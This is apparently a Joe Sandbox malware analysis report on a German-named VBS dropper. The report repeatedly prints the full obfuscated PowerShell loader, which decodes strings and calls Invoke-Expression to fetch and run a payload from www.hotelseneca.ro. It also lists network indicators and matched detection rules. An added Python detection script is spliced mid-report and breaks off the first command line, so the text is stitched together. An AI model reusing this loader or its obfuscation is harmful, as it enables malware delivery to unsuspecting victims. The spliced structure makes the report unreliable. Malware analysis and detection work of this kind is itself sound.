              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11) {$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1 ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma] Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. 
xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA .eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOFe tpIlliv UbeEParajUnden AtoI OffnAbj gDespe LadrMononMissEAll . .erSfllePKanolR ali,almtKitt(nonb$BughV inE fr,L inylcageUUr sMVi.jyS nf)Regn ');Fritidsklubberne (Blaaklokkers $Arkipelagers);$Opvejningerne=$Salmedigtningers[0];$Autostandardization=(Blaaklokkers 'Moda$BobfgMuslLL viO omabAwarATes l for: .eisTvinnCommd Blae My rPoemlUn aeKmpem PranSndeiLokaNSt eGTrk,ESt iRDa enHundeBa f=UnheNRaasETeedWUn e-AdepO,edtb LuejSem.eSuppCSkrmtStil BesS PhoYClins Sint C.iEa epm Lyk. PernHar E ksiT A t. dewJgereImbuBLiviCPalelamini stvEBl gNUnaptTa.j ');Fritidsklubberne ($Autostandardization);Fritidsklubbern
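The Sigma hits above fire on process relationships and on the shape of the command line rather than on any string the loader decodes. The Python below is an added example, not part of the Joe Sandbox report and not the Sigma rules themselves (their logic is not reproduced here): it turns the process tree of this report into process-creation events and applies three simplified checks: a script host (wscript.exe or cscript.exe) spawning an interpreter, a script host spawning ping.exe, and an interpreter command line that applies the call or dot-source operator to a variable or defines a function inline and feeds it string literals. The events are constructed from the tree; the parent of PID 7260 (4056) is not named in the report and PID 8108 is shown without a parent, so both are left unknown, and the PowerShell command line is cut to its first few hundred characters.

```python
"""Process-tree checks over the events of this report.

Added example, not part of the Joe Sandbox report and not the Sigma rules it
cites: three simplified checks run over process-creation events constructed
from the process tree above.
"""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# `. ($var) (...)` or `& ($var) (...)`: the dot-source or call operator applied
# to a variable, which is how Fritidsklubberne reaches Invoke-Expression without
# the string "iex" ever appearing in the command line.
INDIRECT_CALL_RE = re.compile(r"[.&]\s*\(\s*\$\w+\s*\)\s*\(")
# Functions defined inside the command line itself.
FUNC_DEF_RE = re.compile(r"function\s+(\w+)\s*\(")

# First few hundred characters of the powershell.exe command line from the tree
# (truncated here; the real one runs to several thousand characters).
PS_CMDLINE_PREFIX = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;'
    "$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization Forepale Kiloers Bulmeurters #>;"
    "$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11) {$Koalabjrn++;}"
    "$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5)"
    "{$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}"
    "function Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}"
    "$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';"
)

# Constructed from the process tree. The parent of PID 7260 (4056) is not named
# in the report and PID 8108 is shown without a parent, so ppid 0 means unknown.
EVENTS = [
    {"pid": 7260, "ppid": 4056, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Kostenvoranschlag.vbs"'},
    {"pid": 7336, "ppid": 7260, "image": r"C:\Windows\System32\PING.EXE",
     "cmdline": "ping Horm5zl_6637.6637.6637.657e"},
    {"pid": 7344, "ppid": 7336, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"pid": 7400, "ppid": 7260, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": PS_CMDLINE_PREFIX},
    {"pid": 8108, "ppid": 0, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": PS_CMDLINE_PREFIX},
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decoder_call_count(cmdline: str) -> int:
    """Count invocations of inline-defined functions on a quoted string literal."""
    return sum(len(re.findall(r"\b" + re.escape(name) + r"\s+'", cmdline))
               for name in FUNC_DEF_RE.findall(cmdline))


def analyse(events: list) -> list:
    """Return (pid, check, detail) triples for every event that trips a check."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        child = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        parent_name = basename(parent["image"]) if parent else None
        if parent_name in SCRIPT_HOSTS and child in INTERPRETERS:
            alerts.append((e["pid"], "script host spawned interpreter", f"{parent_name} -> {child}"))
        if parent_name in SCRIPT_HOSTS and child == "ping.exe":
            alerts.append((e["pid"], "script host spawned ping", e["cmdline"]))
        if child in INTERPRETERS:
            m = INDIRECT_CALL_RE.search(e["cmdline"])
            if m:
                alerts.append((e["pid"], "call operator applied to a variable", m.group(0)))
            n = decoder_call_count(e["cmdline"])
            if n:
                alerts.append((e["pid"], "inline function fed string literals", f"{n} call(s)"))
    return alerts


if __name__ == "__main__":
    for pid, check, detail in analyse(EVENTS):
        print(f"PID {pid}: {check}: {detail}")
```

The second powershell.exe (PID 8108) has no parent in the tree, so the process-relationship checks say nothing about it; the two command-line checks still flag it, which is the reason to keep content-based checks next to parent/child ones. conhost.exe under ping.exe trips nothing.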
              No Suricata rule has matched

              AV Detection

              Source: Submitted sample | Integrated Neural Analysis Model: matched 95.6% probability
              Source: unknown | HTTPS traffic detected: 185.181.240.15:443 -> 192.168.2.7:49700 version: TLS 1.2
              Source: Binary string: *on.pdb source: powershell.exe, 00000004.00000002.1460713089.000001677BC95000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tem.Core.pdbz' source: powershell.exe, 0000000D.00000002.2539499175.0000000002D7F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tomation.pdbGk source: powershell.exe, 00000004.00000002.1460713089.000001677BC95000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\PING.EXE ping Horm5zl_6637.6637.6637.657e
              Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: global traffic | HTTP traffic detected: GET /Perspectivist.snp HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: www.hotelseneca.ro | Connection: Keep-Alive
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global traffic | DNS traffic detected: DNS query: Horm5zl_6637.6637.6637.657e
              Source: global traffic | DNS traffic detected: DNS query: www.hotelseneca.ro
              Source: powershell.exe, 0000000D.00000002.2569380323.0000000007444000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro#
              Source: powershell.exe, 0000000D.00000002.2569380323.00000000073D0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoftP
              Source: powershell.exe, 00000004.00000002.1391887473.0000016765994000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://hotelseneca.ro
              Source: powershell.exe, 00000004.00000002.1453020255.0000016773913000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 0000000D.00000002.2543840351.0000000004B47000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000004.00000002.1391887473.00000167638A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2543840351.00000000049F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 0000000D.00000002.2543840351.0000000004B47000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000004.00000002.1391887473.0000016765994000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.hotelseneca.ro
              Source: powershell.exe, 00000004.00000002.1391887473.00000167638A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 0000000D.00000002.2543840351.00000000049F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 0000000D.00000002.2543840351.0000000004B47000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000004.00000002.1391887473.000001676463C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
              Source: powershell.exe, 00000004.00000002.1453020255.0000016773913000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000004.00000002.1391887473.00000167658E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1391887473.0000016763AC7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.hotelseneca.ro
              Source: powershell.exe, 00000004.00000002.1391887473.0000016763AC7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.hotelseneca.ro/Perspectivist.snpP
              Source: powershell.exe, 0000000D.00000002.2543840351.0000000004B47000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.hotelseneca.ro/Perspectivist.snpXR
              Source: powershell.exe, 00000004.00000002.1460713089.000001677BC95000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.hotelseneca.ro/Perspectivist.snpmuim
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700
              Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443
              Source: unknown | HTTPS traffic detected: 185.181.240.15:443 -> 192.168.2.7:49700 version: TLS 1.2

              System Summary

              Source: amsi64_7400.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
              Source: amsi32_8108.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7400, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 8108, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
              Source: C:\Windows\System32\wscript.exe | COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
              Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
              Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11) {$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1 ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma] Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. 
xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA .eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOFe tpIlliv UbeEParajUnden AtoI OffnAbj gDespe LadrMononMissEAll . .erSfllePKanolR ali,almtKitt(nonb$BughV inE fr,L inylcageUUr sMVi.jyS nf)Regn ');Fritidsklubberne (Blaaklokkers $Arkipelagers);$Opvejningerne=$Salmedigtningers[0];$Autostandardization=(Blaaklokkers 'Moda$BobfgMuslLL viO omabAwarATes l for: .eisTvinnCommd Blae My rPoemlUn aeKmpem PranSndeiLokaNSt eGTrk,ESt iRDa enHundeBa f=UnheNRaasETeedWUn e-AdepO,edtb LuejSem.eSuppCSkrmtStil BesS PhoYClins Sint C.iEa epm Lyk. PernHar E ksiT A t. dewJgereImbuBLiviCPalelamini stvEBl gNUnaptTa.j
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFAACBAD202
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFAACBAC456
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFAACE2026A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_03050A6A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_03053762
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_0305DA40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_0305D990
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_03051D08
Source: Kostenvoranschlag.vbs | Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 6513
Source: unknown | Process created: Commandline size = 6513
Source: amsi64_7400.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_8108.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7400, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8108, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal100.troj.expl.evad.winVBS@9/7@2/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Commandoes.Gre
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8116:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ar1xfkvw.0r3.ps1
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Kostenvoranschlag.vbs"
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process Where Name = 'Kvartalets.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7400
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8108
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Kostenvoranschlag.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\PING.EXE ping Horm5zl_6637.6637.6637.657e
Source: C:\Windows\System32\PING.EXE | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11) {$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1 ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma] Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. 
xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA .eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOFe tpIlliv UbeEParajUnden AtoI OffnAbj gDespe LadrMononMissEAll . .erSfllePKanolR ali,almtKitt(nonb$BughV inE fr,L inylcageUUr sMVi.jyS nf)Regn ');Fritidsklubberne (Blaaklokkers $Arkipelagers);$Opvejningerne=$Salmedigtningers[0];$Autostandardization=(Blaaklokkers 'Moda$BobfgMuslLL viO omabAwarATes l for: .eisTvinnCommd Blae My rPoemlUn aeKmpem PranSndeiLokaNSt eGTrk,ESt iRDa enHundeBa f=UnheNRaasETeedWUn e-AdepO,edtb LuejSem.eSuppCSkrmtStil BesS PhoYClins Sint C.iEa epm Lyk. PernHar E ksiT A t. dewJgereImbuBLiviCPalelamini stvEBl gNUnaptTa.j
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11) {$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1 ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma] Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls 